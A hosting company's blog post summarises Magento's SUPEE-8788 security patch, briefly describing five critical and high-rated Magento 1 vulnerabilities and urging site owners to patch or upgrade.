Multiple High Risk Vulnerabilities in all Magento 1 Websites

Multiple High Risk Vulnerabilities in all Magento 1 Websites

magento-security-patches

A large number (seventeen in total !) of security vulnerabilities have recently been announced by Magento, many of which are rated as critical and high and should therefore be patched as soon as possible using patch SUPEE-8788. Using the following release versions, Community Edition 1.9.3 or Enterprise Edition 1.14.3, are alternate ways to fix these issues.

Full details of all vulnerabilities can be see here, but those rated critical or high are listed below

APPSEC-1484 – Remote Code Execution in checkout

Rated at 9.8 (Critical) – With some payment methods it might be possible to execute malicious PHP code during checkout.

APPSEC-1480 – SQL injection in Zend Framework

Rated at 9.1 (Critical) – A bug in Zend Framework value escaping allows a malicious user to inject SQL through the ordering or grouping parameters. While there are no known frontend entry point vulnerabilities that would allow for a full SQL injection, we’ve found an entry point in the Magento Admin panel, and other entry points most likely exist.

APPSEC-1488 – Stored XSS in invitations

Rated at 8.2 (High) – It is possible to use the Magento Enterprise Edition invitations feature to insert malicious JavaScript that might be executed in the admin context.

APPSEC-1247 – Block cache exploit

Rated at 7.7 (High) – With access to any CMS functionality, an attacker with administrator permissions can use blocks to exfiltrate information stored in cache. This sensitive information includes store configuration, encryption key, and database connection details. Additionally, it might be possible to execute code.

APPSEC-1517 – Log in as another customer

Rated at 7.5 (High) – In certain configurations, it is possible to log in as existing store customer while knowing only his email address, not his password.

The following two tabs change content below.
This is the main Havenswift Hosting company account that is used by different members of staff when making blog postings on behalf of the company rather than as individuals

Latest posts by Havenswift Hosting (see all)

Post Your Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Copyright Havenswift Hosting 2007-2018. All rights reserved.